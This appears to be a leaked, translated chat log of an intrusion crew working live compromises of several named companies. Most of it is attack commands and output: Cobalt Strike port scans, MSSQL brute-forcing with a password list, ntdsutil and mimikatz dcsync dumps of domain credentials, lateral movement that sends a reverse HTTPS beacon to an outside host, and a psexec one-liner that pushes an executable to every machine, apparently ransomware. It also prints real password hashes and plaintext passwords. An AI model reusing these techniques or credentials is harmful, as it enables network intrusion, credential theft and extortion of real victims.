[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: )
```

Don't forget this for the brute force: the custom SQL port means a different thing.
```
beacon> portscan 10.10.1.41 61340
[*] Tasked beacon to scan ports 61340 on 10.10.1.41
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.10.1.41' is alive. [read 8 bytes]
[+] received output:
10.10.1.41:61340
Scanner module is complete
```

The second one is closed.
Check 61340, command + output.

```
beacon> portscan 10.10.1.41
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 10.10.1.41
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.10.1.41' is alive. [read 8 bytes]
10.10.1.41:5985
10.10.1.41:3389
10.10.1.41:443
10.10.1.41:139
10.10.1.41:135
10.10.1.41:80
10.10.1.41:445
```

```
beacon> portscan 10.7.18.36
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 10.7.18.36
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.7.18.36' is alive. [read 8 bytes]
10.7.18.36:5985
10.7.18.36:3389
10.7.18.36:135
10.7.18.36:80
```

First and last: check what port.
Password: navproject123

```
Pinging FORTICLIENTEMS.matches.com [10.10.1.41] with 32 bytes of data:
Reply from 10.10.1.41: bytes=32 time=110ms TTL=121
Reply from 10.10.1.41: bytes=32 time=181ms TTL=121
Reply from 10.10.1.41: bytes=32 time=300ms TTL=121
Reply from 10.10.1.41: bytes=32 time=279ms TTL=121
Ping statistics for 10.10.1.41:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 110ms, Maximum = 300ms, Average = 217ms

Pinging EC2AMAZ-U49LCLF.matches.com [10.1.4.4] with 32 bytes of data:
Reply from 10.1.4.4: bytes=32 time=112ms TTL=121
Reply from 10.1.4.4: bytes=32 time=112ms TTL=121
Reply from 10.1.4.4: bytes=32 time=202ms TTL=121
Reply from 10.1.4.4: bytes=32 time=180ms TTL=121
Ping statistics for 10.1.4.4:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 112ms, Maximum = 202ms, Average = 151ms

Pinging AWS-VPBCSQL03.matches.com [10.5.19.37] with 32 bytes of data:
Reply from 10.5.19.37: bytes=32 time=186ms TTL=121
Reply from 10.5.19.37: bytes=32 time=122ms TTL=121
Reply from 10.5.19.37: bytes=32 time=148ms TTL=121
Reply from 10.5.19.37: bytes=32 time=122ms TTL=121
Ping statistics for 10.5.19.37:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 122ms, Maximum = 186ms, Average = 144ms

Pinging AWS-VTBIMSTRI03.matches.com [10.7.18.36] with 32 bytes of data:
Reply from 10.7.18.36: bytes=32 time=136ms TTL=121
Reply from 10.7.18.36: bytes=32 time=122ms TTL=121
Reply from 10.7.18.36: bytes=32 time=137ms TTL=121
Reply from 10.7.18.36: bytes=32 time=122ms TTL=121
Ping statistics for 10.7.18.36:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 122ms, Maximum = 137ms, Average = 129ms
```

```
(ICMP) Target '10.10.1.41' is alive. [read 8 bytes]
[+] received output:
Scanner module is complete
(ICMP) Target '10.1.4.4' is alive. [read 8 bytes]
10.1.4.4:1433
Scanner module is complete
(ICMP) Target '10.5.19.37' is alive. [read 8 bytes]
10.5.19.37:1433
Scanner module is complete
[+] received output:
(ICMP) Target '10.7.18.36' is alive. [read 8 bytes]
[+] received output:
Scanner module is complete
```

`MSSQLSvc.matches.com [204.74.99.100]`
`CREATE LOGIN [Abby] WITH PASSWORD=N'abbyabby', DEFAULT_DATABASE=[master],`
[ ](https://mediaeveryone.com/group/matches?msg=WHrvRc9wXZ5vuZfsf)
Yes.
`"SysConnStr"="company=Carpetright UK;server=CSONAVQA01;dbname=CSONAVQA01;user=repl_ho;passwd=admin;|fin|ndbcs@370"`
SQL ports, by the way, are listed in AD again. Read the conclusion. You like to be more secretive and unnecessarily drop files on the disk, but it makes a lot of noise (traffic). For the future: when you scan for anything, check the port you actually need to check. It is hardly there. DHCP, certainly.
Not pinging SQL again?

```
Unable to Connect: )
```

At least I saw it myself. Why didn't you scan it?

```
(ICMP) Target '10.1.4.4' is alive. [read 8 bytes]
10.1.4.4:1433
Scanner module is complete
```

```
(ICMP) Target '10.7.18.36' is alive. [read 8 bytes]
[+] received output:
Scanner module is complete
```

```
beacon> portscan 10.7.19.25 1433
[*] Tasked beacon to scan ports 1433 on 10.7.19.25
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
```

And more: please send me the port scans of all 3 servers. It was not in rockyou?

```
for /f %s in (srv.txt) do @ (for /f %p in (pwd.txt) do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt)
```

Something like this is possible, but there is a mistake somewhere in this command ;-)
The dumbest thing on the SQL brute is this above:

```
1
123
1234
12345
123456
1234567
12345678
123456789
1234567890
sa
sasa
sqlsa
sqladmin
sqladmin1
sa1
s@dmin
P455w0rd
p455w0rd
p455word
p455wOrd
P455word
P455wOrd
P4ssw0rd
p4ssw0rd
p4sSw0rd
p4Ssw0rd
P4ssword
p4ssword
p4sswOrd
P4sswOrd
P@55w0rd
p@55w0rd
p@55word
P@55word
p@55wOrd
P@55wOrd
pa55w0rd
pa55w0rd
pa55word
Pa55word
Passw0rd
passw0rd
PasswOrd
Password
password
PaSsWoRd
PASSword
PASSWORD
passwOrd
pa$w0rd
pa$word
P@ssw0rd
p@ssw0rd
p@sSw0rd
p@Ssw0rd
P@ssword
p@ssword
p@sswOrd
P@sswOrd
P@$w0rd
p@$w0rd
p@$$word
p@$wOrd
P@$word
P@$wOrd
P455w0rd1
p455w0rd1
p455word1
p455wOrd1
P455word1
P455wOrd1
P4ssw0rd1
p4ssw0rd1
p4sSw0rd1
p4Ssw0rd1
P4ssword1
p4ssword1
p4sswOrd1
P4sswOrd1
P@55w0rd1
p@55w0rd1
p@55word1
P@55word1
p@55wOrd1
P@55wOrd1
pa55w0rd1
Pa55w0rd1
pa55word1
Pa55word1
Passw0rd1
passw0rd1
PasswOrd1
Password1
password1
PaSsWoRd1
PASSword1
PASSWORD1
passwOrd1
pa$w0rd1
pa$word1
P@ssw0rd1
p@ssw0rd1
p@sSw0rd1
p@Ssw0rd1
P@ssword1
p@ssword1
p@sswOrd1
P@sswOrd1
P@$w0rd1
p@$w0rd1
p@$word1
p@$wOrd1
P@$word1
P@$wOrd1
```

```
[*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner.
[*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner.
[*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner.
[-] 10.1.4.4:1433 - Unable to parse encryption req during pre-login, this may not be a MSSQL server
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Unable to Connect: )
[*] Scanned 3 of 3 hosts (100% complete)
exploit -j
[*] Auxiliary module running as background job 1.
msf6 auxiliary(scanner/mssql/mssql_login) >
[*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner.
[*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner.
[*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner.
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: )
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Unable to Connect: )
[*] Scanned 3 of 3 hosts (100% complete)
exploit -j
[*] Auxiliary module running as background job 2.
msf6 auxiliary(scanner/mssql/mssql_login) >
[*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner.
[*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner.
[*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner.
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: )
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Unable to Connect: )
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 3 of 3 hosts (100% complete)
```

All 3 servers? All failed.
Password$, PasswordA€ pw08, PasswordA€, pw08
I also recommend building your own brute-force dictionary for the future, one that is not tied to domain, year and server name.
Password$ PasswordA€ pw08
`setg Proxies socks4:104.238.205.128:2282`
Checkable. There is an excellent one.)
Look in the hashes.
[ ](https://mediaeveryone.com/group/matches?msg=Af9FsrNjnoLdqp8dG)
Where is it from?
[ ](https://mediaeveryone.com/group/matches?msg=Ht6pTTvpaofN7oE4B)
.sa sapw08;
@user1 hasn't pulled the hash?
+ Sleep + highlighted in yellow.
Sleep. Good morning, and you can all go home and dump what's available.
@user3, the session in Cobalt: highlight where the file is, I'll take the SAM.
Session in sleep. You get it in the Cobalt uploads.
Sanja, sleep. Are you in the Cobalt uploads? Only you at work?
I mean, my productivity will be 50% less because I get up at 8 in the morning. And it will be good if it's only mine.
You know what it would be if grandma had a bolt.
But if I had archived...
In 4 hours I already get up.)
I know: the smaller the date that comes out, the better. =)

```
saiglobal.com\adm.bisfra0 aad3b435b51404eeaad3b435b51404ee:6778ead5a63d0e8da0a2235147af85a0
saiglobal.com\adm.brodan0 aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6
saiglobal.com\adm.brodav1 aad3b435b51404eeaad3b435b51404ee:4f1ef28113c7375b22d3f31bd294fa4e
saiglobal.com\adm.damben0 aad3b435b51404eeaad3b435b51404ee:dd9507d8ad5d23af29f99fdbe979d72a
saiglobal.com\adm.evamar1 aad3b435b51404eeaad3b435b51404ee:65a8bca59e4205fc94ed31e11f78d4ac
saiglobal.com\adm.kalnic0 aad3b435b51404eeaad3b435b51404ee:d9c4c5a3dca649913994767d6276b9f9
saiglobal.com\adm.turime0 aad3b435b51404eeaad3b435b51404ee:2a0974987cad16892cf57c3f3646e1ea
saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67
```

We are in no hurry ;)
Then you delete everything after you drop the file into the system, archive it and compress it 577 times over the internet.)) There is no archiver in the archive? Brr, it's about half an hour for 100 MB.
Dump waiting to load.
Still at work?
No.
@user3 finished with the dump?
Golden words, I wholeheartedly support :thinking:
Let's take it into account and do it differently in the future :face_with_monocle:
But in the creds it was necessary to put exactly the "short" variant. So it happened because, yes, EAs were needed before getting the session on the trust. Originally I wanted to do so, but then I thought "why the fuck then get them through AD" and decided "but suddenly it may be necessary", and that's how it is, and here's the result.
Just like the list of DCs, EAs, OK. In the future, I see you delivered it from ad_users, yes, and other things. Next time in creds.txt just output `net group "domain admins"` and that's all.)
If anything, you can take it from mine. He said that he has everything sorted.
Misha, leave c360?
Well, for all that worked today: report. Misha finalized c360.
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=35agEhdwKYvDpwkSZ)
And why 3 domains inside?
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vtPCrjfCF2HwvMfKx)
Nobody read it.)
Well, in general, here the trust was a chore; next time it will be much faster.) And all the rest is a matter of time, routine.) The hardest was to get into the trust.
Yes, I also got tired.) Let's finish, there is not much left.)
How nice that you win with us.) Tomorrow is a hard day.
Sleep? No, already half an hour to finish.
Now all night work?
Doing it, now, forgot.
@user9 where are EA, DA, LA? Kerbs separately? Really, kerbs are kerb, the rest are hashes.
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=tm3NpqFRoaH3MFnyd)
Kerbs from dcsync, hashes from kerb? Have not arrived yet? I already passed the session.
So how are you doing with the others? Tomorrow from 3:30?
+5 servers not distributed, leave as is.
104.238.205.128
Aha, in the archive, and take it away in the report.

```
beacon> run ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q
[*] Tasked beacon to run: ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q
[+] host called home, sent: 78 bytes
[+] received output:
ntdsutil: ac in ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: cr fu c:\windows\temp\abcd
Creating snapshot...
Snapshot set {30839d3a-489d-4c9e-9a4f-feea14764ebf} generated successfully.
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} mounted as C:\$SNAP_202010061119_VOLUMEC$\
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202010061119_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: c:\windows\temp\abcd\Active Directory\ntds.dit

                  Defragmentation  Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

Copying registry files...
Copying c:\windows\temp\abcd\registry\SYSTEM
Copying c:\windows\temp\abcd\registry\SECURITY
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} unmounted.
IFM media created successfully in c:\windows\temp\abcd
ifm: q
ntdsutil: q
```

I do not have a ping to you. It has not come to you? Jammed, yes?
+ Maybe you passed your Cobalt, maybe.) I have live ones from the login domain; I did not touch them when the data center jumped from saig.frd.global. Why then saig at the same time?
I have not looked in different tries. Have I asked above: was port 445 open? Are the accesses valid?

```
beacon> shell tasklist /s 10.225.10.215 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.215 /v
[+] host called home, sent: 59 bytes
```

Is there a command for you in winlogon? On any system, and all of them: "host called home, sent 60 bytes", no output.
```
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:legalco.local /all /csv command
[+] host called home, sent: 438858 bytes
[-] could not spawn C:\Windows\system32\mstsc.exe: 2
[-] Could not connect to pipe: 2
```

What's the error?

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```

tasklist doesn't give out processes where I put them.
Strange that not all servers are in the servers group.)
What a strange group of servers...

```
Servers:
USATLHC-360FS1.datacenter.local
USHDC1-360FS1.datacenter.local
USHDC1-360MX2.datacenter.local
USHDC1-360MX1.datacenter.local
USHDC1-CSPFPS03.datacenter.local
USHDC1-CSPFPS12.datacenter.local
USHDC1-CSPFPS08.datacenter.local
USHDC1-CSPFPS02.datacenter.local
USHDC1-CSPFPS04.datacenter.local
USHDC1-CSPFPS14.datacenter.local
USHDC1-CSPFPS13.datacenter.local
USHDC1-CSPFPS10.datacenter.local
USHDC1-CSPFPS01.datacenter.local
USHDC1-CSPFPS09.datacenter.local
USHDC1-CSPFPS11.datacenter.local
USHDC1-CSQFPS01.datacenter.local
USHDC1-CSQFPS02.datacenter.local
USHDC1-CSPFPS06.datacenter.local
USHDC1-CSPFPS05.datacenter.local
USHDC1-CSPFPS07.datacenter.local
USHDC1-CSPMGW02.datacenter.local
USHDC1-CSPMGW03.datacenter.local
USHDC1-CSPMGW01.datacenter.local
USHDC1-CSPMGW04.datacenter.local
```

Could I log what...? I logged what I could. I logged by domain login and hash immediately here. Did you log DAs and hashes?
2 minutes. That takes time.

```
ERROR: Logon failure: unknown user name or bad password
```

First things first.

```
beacon> shell tasklist /s 10.195.23.13 /v
[*] Tasked beacon to run: tasklist /s 10.195.23.13 /v
[+] host called home, sent: 58 bytes
```

Let's find a worker and get those admins' hashes off it. Don't do that again, you'll get bogged down.
```
beacon> shell tasklist /s 10.195.23.14 /v
[*] Tasked beacon to run: tasklist /s 10.195.23.14 /v
[+] host called home, sent: 58 bytes
[+] received output:
ERROR: Logon failure: unknown user name or bad password.
```

Or are the creds invalid?
All 5 off RDP?
Are there only 5? @user3 many more left?
I'm not done; don't get the tosslists here. Inside: the AD info, hashes, creds.txt and the archive = name of the domains. Dump reports by domain. It doesn't finish. Sort the machines.
0.dead.zohocorpin.com
I remembered that we were just on a VPN and couldn't find a VPN before? Since the fall, it's been like 100 years since we had.... (Do we not have sessions here? Pass. There will be about 20+, would be good. In TV there will be swampy, yes? All the same as yesterday.) TV with what? Work 7 :space_invader: hihi
Hi all, it's deaf here, no luck getting online, still under the VPN. Tell me, how are things here?

```
Remote Admin
```

That means he's an admin.)
AWS-VPDC01 10.5.20.30

```
beacon> rev2self
[*] Tasked beacon to revert token
beacon> make_token .\administrator Tabiam*987
[*] Tasked beacon to create a token for .\administrator
beacon> jump psexec_psh AWS-VDDC01 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (fixtom.com:443) on AWS-VDDC01 via Service Control Manager (PSH)
[+] host called home, sent: 214325 bytes
[+] Impersonated DATACENTER2\Administrator
[-] Could not open service control manager on AWS-VDDC01: 5
[-] Could not connect to pipe (\\AWS-VDDC01\pipe\status_59f6): 1326
```

These are the shares so far, just these.
```
\\AWS-VPDC02\ADMIN$     - Remote Admin
\\AWS-VPDC02\C$         - Default share
\\AWS-VPDC02\IPC$       - Remote IPC
\\AWS-VPDC02\NETLOGON   - Logon server share
\\AWS-VPDC02\SYSVOL     - Logon server share
\\HO-VPDC01\ADMIN$      - Remote Admin
\\HO-VPDC01\C$          - Default share
\\HO-VPDC01\IPC$        - Remote IPC
\\HO-VPDC01\NETLOGON    - Logon server share
\\HO-VPDC01\SYSVOL      - Logon server share
\\AWS-VDDC01\ADMIN$     - Remote Admin
\\AWS-VDDC01\C$         - Default share
\\AWS-VDDC01\IPC$       - Remote IPC
\\AWS-VDDC01\NETLOGON   - Logon server share
\\AWS-VDDC01\print$     - Printer Drivers
\\AWS-VDDC01\SYSVOL     - Logon server share
\\AWS-VPDC01\ADMIN$     - Remote Admin
\\AWS-VPDC01\C$         - Default share
\\AWS-VPDC01\IPC$       - Remote IPC
\\AWS-VPDC01\NETLOGON   - Logon server share
\\AWS-VPDC01\SYSVOL     - Logon server share
\\AWS-VPLODC01\ADMIN$   - Remote Admin
\\AWS-VPLODC01\C$       - Default share
\\AWS-VPLODC01\IPC$     - Remote IPC
\\AWS-VPLODC01\NETLOGON - Logon server share
\\AWS-VPLODC01\SYSVOL   - Logon server share
```

Check carefully in the syslogin: where did we get this from?
KLLOGIN=administrator
KLPASSWD=Tabiam*987
The script doesn't find the share; no trusts; it writes to Remote Desktop Users.
There seem to be no trusts.

```
[*] 10/02 14:15:37 - Executing PowerView Get-DomainTrust via PowerPick
[*] Tasked beacon to run: Get-DomainTrust -Server 10.7.20.30 -Domain matches.com (unmanaged)
[+] host called home, sent: 133715 bytes
```

If they are not going to be dismounted, then let's go back to the original problem: I don't understand why they shouldn't be dismounted, but if they are, why should I ignore them?
`OU=OLD Disabled Users,OU=Disabled Accounts`
Can't take anything down; just up-to-date information, especially after news like this, is always good. After this, the lists of DAs may have changed, as well as the lists of DCs; some of the network may have been closed.
`CN=Service Accounts`
Then maybe the service account was a DA?
[ ](https://mediaeveryone.com/group/matches?msg=oG8izZZgEp6uYmy5h)
Pull out the lists of PCs and users, and in them find the domain controllers and domain admins by group.
I don't understand a bit why to do this on a dedicated server.

```
beacon> shell net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators
[*] Tasked beacon to run: net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators
[+] host called home, sent: 132 bytes
[+] received output:
The request will be processed at a domain controller for domain WORKGROUP.
System error 1355 has occurred.
The specified domain either does not exist or could not be contacted.
```

```
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:
[-] Error: 0
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
```

Yes, EA, DC listings.
Reset. Does ping see the host? Did I do something wrong again?

```
beacon> net view \\HK-VPDC01 /all
[*] Tasked beacon to run net view on \\HK-VPDC01 /all
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts for domain '\\HK-VPDC01 /all':
 Server Name     IP Address      Platform Version Type Comment
 -----------     ----------      -------- ------- ---- -------
[-] Error: 87
beacon> net view \\AWS-VDDC01 /all
[*] Tasked beacon to run net view on \\AWS-VDDC01 /all
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts for domain '\\AWS-VDDC01 /all':
 Server Name     IP Address      Platform Version Type Comment
 -----------     ----------      -------- ------- ---- -------
[-] Error: 87
```

```
.PARAMETER Domain
    Domain to query for machines.
```

`Invoke-ShareFinder -HostList hosts.txt`

```
function Invoke-ShareFinder {
    <#
    .SYNOPSIS
    Finds (non-standard) shares on machines in the domain.

    Author: @harmj0y

    .DESCRIPTION
    This function finds the local domain name for a host using Get-NetDomain,
    queries the domain for all active machines with Get-NetComputers, then for
    each server it lists of active shares with Get-NetShare. Non-standard shares
    can be filtered out with -Exclude* flags.

    .PARAMETER HostList
    List of hostnames/IPs to search.

    .PARAMETER ExcludeStandard
    Exclude standard shares from display (C$, IPC$, print$ etc).

    .PARAMETER ExcludePrint
    Exclude the print$ share

    .PARAMETER ExcludeIPC
    Exclude the IPC$ share

    .PARAMETER CheckShareAccess
    Only display found shares that the local user has access to.

    .PARAMETER CheckAdmin
    Only display ADMIN$ shares the local user has access to.

    .PARAMETER Ping
    Ping each host to ensure it's up before enumerating.

    .PARAMETER NoPing
    Don't ping each host to ensure it's up before enumerating.

    .PARAMETER Delay
    Delay between enumerating hosts, defaults to 0

    .PARAMETER Jitter
    Jitter for the host delay, defaults to +/- 0.3

    .PARAMETER Domain
    Domain to query for machines.

    .EXAMPLE
    > Invoke-ShareFinder
    Find shares on the domain.

    .EXAMPLE
    > Invoke-ShareFinder -ExcludeStandard
    Find non-standard shares on the domain.

    .EXAMPLE
    > Invoke-ShareFinder -Delay 60
    Find shares on the domain with a 60 second (+/- *.3)
    randomized delay between touching each host.

    .EXAMPLE
    > Invoke-ShareFinder -HostList hosts.txt
    Find shares for machines in the specified hostlist.

    .LINK
    http://blog.harmj0y.net
    #>
```

Also, you can make life a lot easier for yourself:

```
net view \\hostname /all
```

Take ad_computers.txt and from there insert the hostnames one by one into the command instead of hostname.
Yes.)

```
beacon> psinject 7256 x64 Invoke-ShareFinder
[*] Tasked beacon to psinject: Invoke-ShareFinder into 7256 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or could not be contacted."
ERROR: At line:849 char:9
ERROR: +         $CompSearcher.FindAll() | ForEach-Object {
ERROR: +         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR:     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
ERROR:     + FullyQualifiedErrorId : COMException
ERROR:
WARNING: [!] No hosts found!
beacon> net view \\hostname /all
[*] Tasked beacon to run net view on \\hostname /all
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts for domain '\\hostname /all':
 Server Name     IP Address      Platform Version Type Comment
 -----------     ----------      -------- ------- ---- -------
[-] Error: 87
```

Do not forget to re-create the EA and DA lists: everywhere there may be a password from a service DA or just from a DA; they have scripts (ps1, cmd, bat), some credentials, password and account files, etc.
Then do it now. If the script does not start, then manually (or via a batch file) through `net view \\hostname /all`.
There are already a lot of things tried; I thought and did it. Now I looked on the search; it was not there.
Have you run it when the domain is visible? As a tool, or output in this domain?

```
beacon> shell wmic /node:192.168.110.198 logicaldisk get caption /user:dom.helpathome.com\abunag /password:Start2020
[*] Tasked beacon to run: wmic /node:192.168.110.198 logicaldisk get caption /user:dom.helpathome.com\abunag /password:Start2020
[+] host called home, sent: 133 bytes
[+] received output:
Invalid GET switch.
```

I'll finish up here quietly and double-check it, and then divide the tasks by server. @tl1 is all there.
You're not needed here anymore, go to helpathome.
"The handle is invalid." It's a protection against running under a system context: by removing the token beforehand and specifying it. Yes, tokens, when done. Try without the "-s" parameter. Let it spin. Not even read the conf.) Seems to have gone with the file... See what you're doing. Try it with the cradle. If you can't get the service under the token, try to bump the user. Hosts in the file, and check that the error is flying at the moment of the domain inquiry.
Reading from a File: Another way you can run commands on multiple computers at once is to use a text file. Using the syntax @, PsExec will read every line in the text file as if it were a computer name. It will then process each computer individually.
Error. tm1 psexec caught the bug. =)
How are you doing? It's almost 3 hours already, and psexec is already done. What's the difference, kill the services that can hold files and that's it? Who knows how to tell if it's an autorun service or not? And from the domain admin token itself, in system32 drop only psexec and the file itself:

```
psexec \\* -d -s -h start.exe -accepteula -y
```

And run it like this.
@tl1 drop the psexec utility on DC2 while the file works with the server systems already "touched".
They switched to Acronis. OK, I already found that the NACs are inactive. There it is not there, or turn all domain records in dnscmd. I thought there was a full page dump from the peak of Everest to the bottom of the Mariana Trench.

```
DNS Servers . . . . . . . . . . . : 192.168.0.222
                                    127.0.0.1
```

I wonder if you can at least show them? @tl1 dump the DC DNS records, maybe we'll find something else there....
2. Not good for two reasons: 1, because I didn't tell you to pull it; 2, because no one figured it out. =)
But the DNS records from the DNS server have not been pulled?
it is currently inactiveThis is not very relevant in part, but it is registered in the DNS with a busy name Pinging nasstorage1.loomisco.com [192.168.0.231] with 32 bytes of data:Even if I saw it192.168.0.231 does anyone know this host? dominant server webservers and kilt pids that may occupy important processesstop services that are in autorun on momaunnyh machines so what? I have not changed it) the main thing then run under the same tokenDaSession made token in the SYSTEM what? systems rights with token? and under them to run the same file where the mounTeam be sure to run the file with SYSTEM rights Status Local Remote Network ------------------------------------------------------------------------------- OK A: \loomiswebsrv4\d$ Microsoft Windows Network OK E: \loomisgw2\d$ Microsoft Windows Network OK Q: \loomiswebsrv4\c$ Microsoft Windows Network OK W: \loomiswebsrv4\f$ Microsoft Windows Network OK X: \loomisgw2\c$ Microsoft Windows Network OK Z: \loomiswebsrv4\e$ Microsoft Windows Network ``There are all active logical disks of the 4 hosts where our file was deleted by an aver beacon> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 170 bytes [+] received output: New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK E: \TLCAutoTFR.loomisco.com\c$ 